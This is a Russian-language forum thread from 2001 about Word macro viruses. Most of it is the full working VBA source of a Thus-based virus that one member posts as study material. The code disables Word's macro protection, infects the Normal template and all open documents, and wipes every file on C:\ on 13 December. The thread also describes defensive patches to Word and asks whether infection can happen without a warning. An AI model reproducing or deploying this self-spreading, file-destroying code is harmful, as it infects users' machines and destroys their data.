Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
макровирусы 23.05.01 20:09
Автор: asker Статус: Незарегистрированный пользователь
|
|
где можно найти доки о сабже (особенно о шифрованных и т.п.). Принципиально интересует вопрос: Отучили ли люди не вываливать сообщение в мсворде о нахождении макросов?
|
|
макровирусы 23.05.01 21:37
Автор: :-) <:-)> Статус: Elderman
Отредактировано 23.05.01 21:52 Количество правок: 1
|
> где можно найти доки о сабже (особенно о шифрованных и
> т.п.).
Кое-что есть в Infected Voice. А вообще с этим все просто: берешь вирус и смотришь его исходник, читаешь хелп по VBA.
Вот недавно поймал:
Private Sub Document_Open()
'Thus_001'
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
.CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.DeleteLines 1, Application.Documents.Item(k) _
.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
.VBComponents.Item(1).CodeModule.CountOfLines)
End If
Next k
If (Day(Now()) = 13) And (Month(Now()) = 12) Then
With Application.FileSearch
.NewSearch
.LookIn = "C:\"
.SearchSubFolders = True
.FileName = .
.MatchTextExactly = False
.FileType = msoFileTypeAllFiles
If .Execute > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
End Sub
Private Sub Document_Close()
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
---
> Принципиально интересует вопрос: Отучили ли люди не
> вываливать сообщение в мсворде о нахождении макросов?
вирус может отключить это предупреждение:
Options.VirusProtection = False, см. приведенный исходник
Но вообще это фигня: можно пропатчить msword97.xlb, заменив в нем строку VirusProtection на VisurProtection, и ни один вирус, который будет пытаться это сделать, не запустится: при открытии зараженного документа Word скажет "Ошибка компиляции" и откроет исходный код вируса в VBA. Также можно пропатчить Word так, чтобы не работали макросы AutoOpen, AutoExec, FileOpen, FileSave... и т.д. Короче полная хана всем макро-вирусам :))
2 dl: А virii board не будет?
|
| |
макровирусы (:-) 23.05.01 23:17
Автор: asker Статус: Незарегистрированный пользователь
|
ok, спасибо за ответ, Да на самом деле IV - классный журнал, да и c MZ, NE, PE, у меня есть опыт, я только ими и увлекался-rulezz, Вот решил поробовать с макро, из-за одной только причины, у меня в универе появился macro97.virri, кстати тоже thus.based, который столько крови попортил мне, и др студ-м, что я сабж начал изучать.
СУТЬ ПРО Принципиальнй ВОПРОС: Смысл в чем: Допутим машина чистая: параметрах, стоит защита(целка). Придумали ли способ, на такую машину сразу (открывая файл) заразить шаблон, и.т.п сразу (ессесно все патча отпадают) без этой мессаги.
КСТА: про вирус раздел в форуме я ЗА!
PS. у меня толь1-12 issues, где можно больше нарыть, и есть ли еще т.п.?
|
| | |
макровирусы (:-) 24.05.01 14:58
Автор: :-) <:-)> Статус: Elderman
Отредактировано 24.05.01 15:11 Количество правок: 1
|
> СУТЬ ПРО Принципиальнй ВОПРОС: Смысл в чем: Допутим машина
> чистая: параметрах, стоит защита(целка). Придумали ли
> способ, на такую машину сразу (открывая файл) заразить
> шаблон, и.т.п сразу (ессесно все патча отпадают) без этой
> мессаги.
Насколько я знаю, это невозможно.
Рекомендую пропатчить Word, Excel, (весь Офис...) и забыть о макро-вирусах
> КСТА: про вирус раздел в форуме я ЗА!
> PS. у меня толь1-12 issues, где можно больше нарыть, и есть
> ли еще т.п.?
Посмотри тут:
http://sbvc.cjb.net/
http://www.sallyone.com/
|
| | | |
макровирусы ;) 26.05.01 15:52
Автор: asker Статус: Незарегистрированный пользователь
|
|
Если нет, то это замечательно...
|
|
|
подробно о проекте
Анализ криптографических сетевых...
